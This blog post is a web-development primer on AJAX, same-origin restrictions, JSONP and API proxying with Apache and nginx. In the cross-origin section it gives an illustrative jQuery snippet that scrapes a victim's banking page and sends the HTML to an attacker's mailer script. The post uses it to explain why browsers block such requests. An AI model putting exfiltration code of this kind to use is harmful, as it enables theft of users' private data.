Intro & A quick primer on how to JSONP-ify APIs that do not support it


Sebastien Renauld

Welcome to this blog!

I'm still building this website, but will attempt to regularly update this blog with the latest news, some how-tos, reactions over the seemingly recurrent StackOverflow bugs (a great indicator of what programmers struggle with, of sorts), primers on slightly shadier parts of web development (purely for information purposes and in an effort to put a spotlight on malpractices), and general code-fu.

The first article will deal with remote APIs and something, I think, we've all hit our heads against: how to break JavaScript remote calls (AJAX being one of them) out of the same-domain-origin sandbox...and what to do when none of these situations apply. On the menu:

  1. A quick primer on AJAX (native and jQuery examples)
  2. The nature and role of cross-origin sandboxing: CSRF hack-fu
  3. JSONP - or how to break out... with some conditions
  4. What to do when JSONP is not supported by the endpoint
  5. Data proxying - introducing reScrape

Read on!

A quick primer on AJAX (native and jQuery examples)

AJAX, as its name suggests (Asynchronous JavaScript and XML, though nowadays the payload is mostly JSON), allows a developer to asynchronously fetch content from a source outside the page and, seeing as JS can run without a page reload, update the page on the fly as content comes in. It is one of the pillars of modern, responsive websites, and a seemingly vital component of some sites (Facebook immediately comes to mind). Its invention also sparked a wide array of new concepts which were completely alien before.

A bit of history - AJAX has been possible ever since the Microsoft XMLHTTP ActiveX component shipped with IE. In a nutshell, think IE5. Until IE7, IE-based browsers and rendering engines exposed it through ActiveX rather than through the native XMLHttpRequest object other browsers used to call other URIs, and thankfully IE7 and later (IE8, IE9 and now IE10) follow everyone else. Before Jesse James Garrett coined the name in 2005, the technique was almost purely used for Outlook Web Access. It then rapidly grew in popularity, and also in refinement.

Making an AJAX request to a resource is now a much easier step than it was five years ago, depending on whether you have to support oldIE or not. If you do, your code will look like this:

function XHR() {
  var transport;
  if (window.XMLHttpRequest) {
    // native object: every modern browser, and IE7+
    transport = new XMLHttpRequest();
  } else {
    // oldIE: check for version 6 before version 3
    try { transport = new ActiveXObject("MSXML2.XMLHTTP.6.0"); } catch (e) {}
    try { if (!transport) transport = new ActiveXObject("MSXML2.XMLHTTP"); } catch (e) {}
  }
  return transport;
}
function myRequest(URI) {
  var transportLayer = XHR();
  transportLayer.onreadystatechange = function() {
    // readyState 4 means the request has completed
    if (transportLayer.readyState == 4) {
      switch (transportLayer.status) {
        case 200:
          // success: the body is in transportLayer.responseText
          break;
      }
    }
  };
  transportLayer.open("GET", URI, true); // true = asynchronous
  transportLayer.send(null);
}

Note a few things on this:

  • The switch in myRequest() allows you to add more cases - pretty common are 301 (redirect - permanent), 302 (redirect - temporary), 201 (created), 500 (whoops, I killed it) and 404 (whoops, wrong door)
  • It is possible to define the request type (GET, POST, PUT, DELETE, HEAD, OPTIONS etc) on the open() call. Note however that the newer HTTP verbs are NOT AVAILABLE on old browsers (IE7 and before, typically)
  • The callback is done asynchronously - you do not need to freeze the browser to get your data (thus warranting the A of AJAX)
  • This code will fail if your visitor is running an IE without native XMLHttpRequest (IE6 and before) with ActiveX objects disabled: XHR() then returns undefined
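
To make the first bullet a bit more concrete, here is a rough sketch of what a fuller switch might look like. The names classifyStatus and myRequestWithCallbacks, as well as the category labels, are made up for illustration; the transport is passed in as a parameter (rather than created by XHR()) purely so the function can be tried with a stub outside a browser.

```javascript
// Hypothetical helper: sort a status code into a rough category.
// The category names are illustrative, not any standard.
function classifyStatus(status) {
  switch (status) {
    case 200: // OK
    case 201: // Created
      return "success";
    case 301: // Moved Permanently
    case 302: // Found (temporary redirect)
      return "redirect";
    case 404: // whoops, wrong door
      return "not-found";
    case 500: // whoops, I killed it
      return "server-error";
    default:
      return "unhandled";
  }
}

// Same shape as myRequest(), with the verb and two callbacks as parameters.
function myRequestWithCallbacks(transport, method, URI, onSuccess, onFailure) {
  transport.onreadystatechange = function () {
    if (transport.readyState !== 4) return; // not finished yet
    var kind = classifyStatus(transport.status);
    if (kind === "success") {
      onSuccess(transport.responseText);
    } else {
      onFailure(kind, transport.status);
    }
  };
  transport.open(method, URI, true); // true = asynchronous
  transport.send(null);
}
```

In a browser you would call it as myRequestWithCallbacks(XHR(), "GET", "/some/resource", onSuccess, onFailure), where the URL is of course a placeholder.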

Nothing major, however. All this can be circumvented pretty easily - it is quite a bit of code for each request, so neatly wrapping it is a requirement. Cue jQuery:

function myRequest(URI) {
  return $.ajax({
    type: "GET",
    url: URI,
    dataType: "json",
    success: function(data) {
    }
  });
}

I used the long-hand version for clarity (I tend to use it anyway, as it gives more freedom). It has the added advantage of doing all the JSON (if dataType is set to "json" or "jsonp") or XML (if dataType is set to "xml") processing for you, and hands the parsed object to the success callback as its first argument (data in the example above).

It also has the main advantage of taking care of all the browser incompatibilities/quirks for you (such as oldIE stuff, or the fact that oldIE doesn't have a JSON parser and code needs to be eval'd, or differences in URL encoding...). What this means is that you can work on the stuff that actually matters.
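
To give an idea of the kind of quirk being hidden, here is a minimal sketch of a JSON parsing fallback. This is not jQuery's actual code: parseJSONCompat is a made-up name, and the second parameter exists only so the fallback path can be forced for demonstration.

```javascript
// Hypothetical helper: use the native JSON parser when there is one,
// otherwise fall back to evaluating the text as a JS expression.
function parseJSONCompat(text, nativeJSON) {
  if (nativeJSON === undefined && typeof JSON !== "undefined") {
    nativeJSON = JSON; // default to the browser's own parser
  }
  if (nativeJSON && typeof nativeJSON.parse === "function") {
    return nativeJSON.parse(text);
  }
  // oldIE path: no native parser, so the text is evaluated.
  // This runs whatever it is given - never do it on data you do not trust.
  return (new Function("return (" + text + ");"))();
}
```

Passing null as the second argument, as in parseJSONCompat('{"a": 1}', null), simulates a browser without a native parser.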

Now that you have your data, you can very easily do what you want: update your page with it, add elements, fire more requests... in theory, all is well in the best of worlds.

The nature and role of cross-origin sandboxing: CSRF hack-fu

...Or how allowing everyone to call anything is a pretty bad idea. That is the bottom line of it. Here is a classic example: suppose that anyone can ping anything on any domain using AJAX and get the data back. I happen to know that you're banking with bank A and that this bank has an online banking facility at www.mybank.site/secure/. In particular, they use frames and the amount of money on the account is on /secure/myMoney.htm (this isn't that uncommon). From my site, I could craft a request as follows:

$.ajax({
  url: "http://www.mybank.site/secure/myMoney.htm",
  type: "GET",
  dataType: "text",
  success: function(d) {
    $.ajax({
     url: "mailer.php",
     data: {
       "result": d
     },
     type: "POST"
    });
  }
});

I am quite simply setting up an AJAX call to ping the online banking site, scrape all the HTML from the page (courtesy of jQuery) and ping it back to mailer.php locally, which will mail it or store it in a DB. If cross-origin restrictions were not in place, this would be possible (and it was until not too long ago!). In theory, I now have all your bank information. Thankfully, cross-origin restrictions were put in place pretty quickly (thank you Netscape, one of the few things you did!).

Cross-origin restrictions are as follows: a request is only allowed when the target matches the current page on all three counts.

  1. Same host (exact)
  2. Same port
  3. Same protocol (http->https is not allowed)

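Note on points 1 and 2: the host match must be exact, so if your visitor accessed your site as mysite.com and you're requesting www.mysite.com, it will fail! The port is compared once the protocol's default has been filled in, so in standards-compliant browsers mysite.com and mysite.com:80 count as the same origin over http, whereas mysite.com:8080 does not.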
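
The three rules can be sketched as a small comparison function. This is only an illustration of the check, not what any browser literally runs; isSameOrigin is a made-up name, and it leans on the URL class, which is a modern API (so no oldIE here).

```javascript
// Hypothetical helper: true when two absolute URLs share
// protocol, host and port.
function isSameOrigin(urlA, urlB) {
  var a = new URL(urlA);
  var b = new URL(urlB);
  return a.protocol === b.protocol &&
         a.hostname === b.hostname &&
         a.port === b.port; // the parser reports a protocol's default port as ""
}

isSameOrigin("http://mysite.com/a", "http://mysite.com/b");      // true
isSameOrigin("http://mysite.com/", "https://mysite.com/");       // false (protocol)
isSameOrigin("http://mysite.com/", "http://www.mysite.com/");    // false (host)
isSameOrigin("http://mysite.com/", "http://mysite.com:8080/");   // false (port)
```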

As you can see, this locks you out of quite a few cool things, including getting stuff from other domains. Fear not, there are ways (crude and elaborate!), and I'll do my best to cover them.

Also, if you are curious, IFRAMEs come with the same restriction in JS: a parent and a child frame cannot read each other's content unless they share the exact same origin (host, port and protocol).

JSONP - or how to break out... with some conditions

Breaking out of this same-origin kerfuffle is not a simple matter. Every simple solution requires the remote provider to change their code, sometimes slightly, sometimes drastically. I have chosen to talk about JSONP as the other alternatives are only supported by modern browsers - though I will eventually cover them all.

JSONP (the P stands for padding) is a way to get around the same-origin restriction by using a script tag, which is not subject to it. jQuery natively supports it, which is a pretty cool thing (dataType: "jsonp"). It works, quite simply, by loading the content in a script tag (this might seem very weird at first if you're new to this. Bear with me, don't laugh) and adding one extra parameter to the URL (usually callback=myname or jsonp=myname). This parameter tells the source to output its results in a slightly different format: it will wrap the JSON data (this time, it has to be JSON. This technique doesn't work with XML) in a call to the function named myname, so that when the script executes, myname is called with the JSON object as its first parameter.
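
To show what the "padding" amounts to on the source's side, here is a minimal sketch. wrapAsJSONP is a made-up name and the data is invented; a real endpoint may do this in any language. The identifier check is my own addition, there so that the callback parameter cannot be used to inject arbitrary script.

```javascript
// Hypothetical server-side helper: wrap JSON data in a call to the
// function named by the callback parameter.
function wrapAsJSONP(callbackName, data) {
  // Only accept plain identifiers as callback names.
  if (!/^[A-Za-z_$][A-Za-z0-9_$]*$/.test(callbackName)) {
    throw new Error("invalid callback name");
  }
  return callbackName + "(" + JSON.stringify(data) + ");";
}

wrapAsJSONP("myname", { user: "seb", posts: 3 });
// → 'myname({"user":"seb","posts":3});'
```

The returned string is what gets served as the script body: plain JavaScript that, once loaded by the script tag, calls myname with the data.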

This has quite a number of implications:

  • For this to work, you'll need to temporarily store a closure in the global scope. This isn't a big deal - attach it to the window object
  • The source needs to understand that JSONP requires substantially different formatting. This is a big deal (as most site owners are lazy).
  • You have less control over the request using this method. For example, the furthest you can go in terms of control is whether the script tag loaded successfully (using a load event). You will not be able to get the request status code or additional header information.
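
Without jQuery, the client side of the points above could look roughly like this. It is a sketch under assumptions: jsonpRequest is a made-up name, the endpoint is assumed to read the callback name from a parameter called callback, and the win and doc parameters (defaulting to the browser's window and document) are there only so the function can be tried with stubs. There is no error handling, which reflects the third point.

```javascript
var jsonpCounter = 0;

// Hypothetical helper: fire a JSONP request and pass the data to onData.
function jsonpRequest(url, onData, win, doc) {
  win = win || window;
  doc = doc || document;
  var name = "jsonp_cb_" + (jsonpCounter++);
  var script = doc.createElement("script");

  // Temporarily expose the callback globally; clean up once it has fired.
  win[name] = function (data) {
    delete win[name];
    if (script.parentNode) script.parentNode.removeChild(script);
    onData(data);
  };

  // Append the callback parameter, respecting an existing query string.
  script.src = url + (url.indexOf("?") === -1 ? "?" : "&") +
               "callback=" + encodeURIComponent(name);
  doc.getElementsByTagName("head")[0].appendChild(script);
  return name;
}
```

In a page, jsonpRequest("http://some.api/data", function (data) { ... }) would be enough, with the URL standing in for a real JSONP-capable endpoint.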

When it works, it is awesome. When it doesn't... it is rather problematic. Another possibility also requires a change to the source's output, this time in the form of a header (CORS, or cross-origin resource sharing). The last option is to proxy the API locally, which I'll cover in the last section as a tidbit of information - as I am currently working on a way to automate this process.
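
For reference, the header in question is Access-Control-Allow-Origin, and it has to be sent by the remote source, not by you. A minimal sketch of how a source might decide what to send, assuming it keeps a whitelist of origins (corsHeadersFor and allowedOrigins are made-up names):

```javascript
// Hypothetical helper for the remote server: build the CORS response
// headers for a request coming from requestOrigin.
function corsHeadersFor(requestOrigin, allowedOrigins) {
  var headers = {};
  if (allowedOrigins.indexOf(requestOrigin) !== -1) {
    headers["Access-Control-Allow-Origin"] = requestOrigin;
    headers["Vary"] = "Origin"; // the response differs per requesting origin
  }
  return headers; // empty object: the browser will block the read
}
```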

Data proxying - introducing reScrape

To bypass the same-origin restrictions, a simple way is to turn the remote call into a local call. Depending on which HTTP daemon you're running, this is done with ProxyPass/ProxyPassReverse (Apache 2 with mod_proxy enabled) or proxy_pass (nginx). I'll briefly cover both. Be warned: if you do not have access to your server's modules or are on a shared hosting platform, this solution will most likely not work either.

Proxying on Apache2

To do this, you will need two new directives in your site's config, as follows:

ProxyPass /my_api/ http://my.remote.api/url/
ProxyPassReverse /my_api/ http://my.remote.api/url/

The URLs obviously need to be changed. This will proxy every call done to the directory my_api to the remote API. You will obviously want to make it slightly more generic.

This solution requires mod_proxy (plus mod_proxy_http for an http:// target), which is not enabled by default on Apache builds. Don't rely on it being available.
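
On the JavaScript side, the only change is the URL you request: the remote address becomes a path on your own domain. A small sketch of that mapping, reusing the two values from the ProxyPass lines above (toProxiedPath is a made-up helper, and the path after the base is invented):

```javascript
// Values taken from the ProxyPass example; adjust both to your own setup.
var REMOTE_BASE = "http://my.remote.api/url/";
var LOCAL_PREFIX = "/my_api/";

// Hypothetical helper: map a remote API URL onto its same-origin proxied path.
function toProxiedPath(remoteUrl) {
  if (remoteUrl.indexOf(REMOTE_BASE) !== 0) {
    throw new Error("URL is not under the proxied API: " + remoteUrl);
  }
  return LOCAL_PREFIX + remoteUrl.slice(REMOTE_BASE.length);
}

toProxiedPath("http://my.remote.api/url/users/42?full=1");
// → "/my_api/users/42?full=1"
```

The resulting path can be handed to a plain AJAX call, since as far as the browser is concerned it lives on your own origin.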

Proxying on nginx

nginx plays much more nicely, as proxy_pass is enabled by default (nginx is a proxy before being a webserver). The downside is that you cannot modify the config unless you own the server. If you do, add this:

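location /api/ {
    proxy_pass http://path.to.my/api/;
    proxy_redirect off;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    # forwards the visitor's Host header as-is; a remote API served from a
    # virtual host may expect its own host name here instead
    proxy_set_header Host $http_host;
    proxy_set_header X-NginX-Proxy true;
}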

Same caveats as Apache.

If you cannot do either, you'll require a third-party service to do it for you. I am currently building such a service, and intend to release it for free & paid usage as soon as possible. Stay tuned!

